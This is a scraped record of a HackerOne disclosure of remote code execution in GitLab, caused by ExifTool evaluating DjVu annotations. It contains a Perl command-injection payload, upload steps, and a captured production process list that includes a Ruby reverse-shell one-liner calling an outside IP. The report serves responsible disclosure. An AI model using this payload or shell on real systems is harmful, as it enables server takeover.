[kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T12:35:10", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T12:35:10", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T12:35:10", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQVJLIUK7I%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T123509Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHwaCXVzLXdlc3QtMiJIMEYCIQDzDJMvggqUmoqESt989DDvOYsn7iAaxy94N0170KfJjwIhAInlUJcmj4mu92FHsVisQCooUiqCy8PGq9sqpRssGggKKvoDCBUQAhoMMDEzNjE5Mjc0ODQ5IgzI%2B0l987GP5MqDJEcq1wN%2FTmxetlM2qnTtOa9Gg%2FW8j9c70GvGMWQVyiVsB8XxgMSHBWWGRLus6yWXt9WJQXkDuMGJpn%2B5dWJX1WcuWPHsJuMfxtWtQR%2FhXa4fUC4e19wssXuHkYC%2BVmS5SNPUFBrYVekVxIC2vQ0l0ZV9Oe5awDwlrRB3aWwpOBs53ASawl9AeRhnB7XIAnmIGhcH0DKeEq3T9iemgBCIY%2BHQtu8Pa2lNdFX4ami2S3Bt3wO15Ezh7WWxtqXDlij%2Bn1jMYOe1z8FdKeU10LtGFmjuiMUKRKnY9S5Kt1r0D4qD62SfnMB6nb%2BmBoff2OPJw46X%2BVDeEMrjeo3dD2S4N%2BaIOxptp6Bmom%2FW8lnq%2BUeVrp4u13%2FSq3QMqxghHYzkxiR3sqELpOHAi%2BSbaw3V03i9gapOHX59hmQZElvRt1ccVAQBX1v2VJiHdS%2FCMR4Ihcz%2BQFzyUFdIUTd7IRAKc%2F0zalRVh5INkEqs%2BgFOXWbzRMkXK7%2FtHzs8WdzzzwVwIm0eYVD8VTBwasRcAIQzGzy7d59WVR2TujIR8UCzgxtYjDrLcJBiXZq8CeMgf6Ls%2FaGUBz8q80qbv9Tj8msNmo37BmLQ2%2FJaZHzjT7Sgd8fya58%2FrqGjh8x9o58wofX%2BhAY6pAHYLgbX6WZSwd6Qez5HemYn12uovuBhgMf2aFEnEJ7I2tiGFbE%2BViBsP1dE0mQIoeRmi4eY%2FcB6qjiFnq7M%2Bc%2FztulDTvk5ADBmISm8dtdYyi4XzQ4aPAj1d7Vp3BYlLLcjsG3BowUyqhO3ZUCKVvydSghwom4PI3mWlZP3oRuGfMcTWEKNZh67mOsnbzbR07RVIxhvwXTV1w%2BAVKW13hVwZ3HF0w%3D%3D&X-Amz-Signature=f5b63443e4a7448e35ca5d87386318f89165589db3886cd3c921e370b9b913f4"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T12:35:10", "differentElements": ["h1reporter"], "edition": 17}, {"bulletin": {"id": "H1:1154542", "hash": "f709cc0872908992a74454f90b35b169", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 